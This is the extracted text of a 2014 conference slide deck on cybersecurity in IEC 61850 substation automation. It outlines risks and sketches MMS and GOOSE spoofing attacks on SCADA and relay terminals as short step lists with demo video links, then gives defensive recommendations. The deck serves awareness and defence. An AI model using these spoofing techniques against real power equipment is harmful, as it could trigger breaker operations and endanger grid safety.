View
103
Download
23
Category
Preview:
DESCRIPTION
Citation preview
CYBER SECURITY IN SUBSTATION AUTOMATION
(IEC 61850)
1
Braguta M.V., Nikandrov M.V.August 2014 г.
• Recent trend: Migration to Ethernet/IP network protocols
• High density of Electronic Intelligent Devices (IED) per controlled unit
• Real time telemetry transmission is highly demanded
• Lack of Security at the control device level, common practices of using default access parameters
• Lack of Cyber Security knowledge and incident readiness
Modern Control Systems:Trend and Risks
Major Risks:- Unauthorized remote access to control room, devices, manufacturing process,- Information theft, modification, altering network data,- Possible denial of service, sabotage of the manufacturing process
2
Industry Incidents by Verticals
3
Energy
Energy sector is the most affected industry
The Attack Vectors
4
internet
Reley protection terminal
object management
Router
Operator workstation 1
switches
ВЛ 220 кВW2E
K2E
QSG3.2
QW2E QS3QS2
QSG 2 QSG3.1
Router
Operator workstation 2Engineeringworkstation
Redundantserver station
network ETHERNET
network ETHERNET
In a corporate network
Control center Engineeringworkstation
Reley protection terminal
Reley protection terminal
Reley protection terminal
Information Disclosure:public websites
5
Social Networks Risks
6
(company)
(belgorodenergo)
(JSC MRSK-Centra belgorodenergo)
(Alexander has 516 friends)
USB devices: Major source of infection
7
Ransom Blockers at Control Room
8
IEC 61850 Capabilities
9
Advantage:- Promotion of high interoperability between systems
from different vendors- Definition of basic services
Main protocols: MMS and GOOSE
was
was
evol
ved
evolved
1. Spoofing of MMS
Sending false positioning control data to SCADA system
• Record network traffic
• Analyze transferred data
• Construct message
• Send to SCADA
10
Constructing Message
11
Sending to SCADA
http://youtu.be/MbxRhQP42N012
2. Spoofing MMS
Sending the false position of the breaker to relay protection terminal
• Record network traffic
• Analyze transferred data
• Construct message
• Send to Relay Terminal
13
Sending to Relay Terminal
http://youtu.be/oh5IAN3euK414
RESULT OF UNAUTHORIZED COMMAND
15
3. GOOSE spoofing - easy!
• Record network traffic
• Analyze transferred data
• Edit message
• Publish the message
16
Sending false commands to the relay terminal from another relay terminal
Edit the Message
17
Sending False GOOSE Message
http://youtu.be/fdnPkqIUWfA18
Result of the Spoofing
19
GOOSE spoofing can applied to all relay terminalscertified by"Rosseti“ (Russian Power Company)
The IEC61850 standard supports RSA digital sign
Prevention and Protection
20
However, NONE of available IED Relays on market offer support for digital sign
Antivirus Issue: False Positive is quite dangerous
21
Suggestions Short-term goals: • Stop ignoring the problem;
• Allocate Cyber Security Personnel Education & Awareness time in Security Policy. Cover Basic Cyber Security and Social Engineering at least 1-2 per year;
• Reduce attack surface and mitigate attack vectors using available methods and security standards;
Long-term goals: • Deploy Industrial Antivirus solutions certified for manufacturing zone;
• Use Intrusion Detection and Deep packet inspection systems;
• Add Integrity control system to protect manufacturing zone subnets and network assets. Detect unknown or unauthorized assets in the network perimeter;
• Be able to isolate and manage devices firmware and detect unauthorized access or modifications;
• Plan to migrate to encrypted network communications in manufacturing zone.22
Conclusions• Power Control Systems need special, carefully designed Cyber Security Policy;
• Overall state of Organization Cyber Security Policy is poor and demands immediate attention;
• The Organization Cyber Security Policy must be reconsidered in general with respect of latest Local and International standards and advisories, the growing danger of ICS threats and lack of personnel readiness to detect threats;
• The Power Control Systems requires Security Audit to all facilities as well as Compliance with modern Cyber Security standards and practices (local and international);
• The Cyber Security requirements must be considered during design and implementation stages for all new objects and facilities;
• All Cyber Security systems must go through extensive testing before to be installed into Control room or connected to power equipment. The testing should be done at manufacturing level as well as at Organization testing facilities in close to real world environment.
23
Thank you for your time!
Nikandrov Maksimnixmak@mail.ru
Special appreciation to «Kaspersky Lab»
24
Recommended